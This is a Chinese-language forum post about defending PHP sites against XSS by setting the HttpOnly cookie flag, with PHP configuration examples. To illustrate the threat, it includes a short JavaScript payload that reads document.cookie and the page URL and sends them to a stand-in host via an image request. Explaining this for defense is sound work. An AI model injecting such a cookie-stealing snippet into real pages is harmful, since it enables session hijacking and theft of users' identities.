时时商务社区

标题: xss防御之php利用httponly防xss攻击 [打印本页]

作者: qz234 时间: 2018-2-14 05:59

         xss的概念就不用多说了，它的危害是极大的，这就意味着一旦你的网站出现xss漏洞，就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持，如果这里面包含了大量敏感信息（身份信息，管理员信息）等，那完了。。。
如下js获取cookie信息：
[U]复制代码[/U] 代码如下:
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;
一般cookie都是从document对象中获取的，现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数，跟domain等其他参数一样，一旦这个HttpOnly被设置，你在浏览器的document对象中就看不到Cookie了。
PHP设置HttpOnly：
[U]复制代码[/U] 代码如下:
//在php.ini中，session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);
//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);
对于PHP5.1以前版本的PHP通过：
[U]复制代码[/U] 代码如下:
header("Set-Cookie: hidden=value; httpOnly");
最后，HttpOnly不是万能的！


您可能感兴趣的文章:

PHP和XSS跨站攻击的防范

解析PHP跨站刷票的实现代码

php安全开发添加随机字符串验证，防止伪造跨站请求

php跨站攻击实例分析

ThinkPHP2.x防范XSS跨站攻击的方法

PHP实现表单提交数据的验证处理功能【防SQL注入和XSS攻击等】

整理php防注入和XSS攻击通用过滤

php过滤XSS攻击的函数

细谈php中SQL注入攻击与XSS攻击

PHP中防止SQL注入攻击和XSS攻击的两个简单方法

PHP实现的防止跨站和xss攻击代码【来自阿里云】

欢迎光临时时商务社区 (http://bbs.4435.cn/)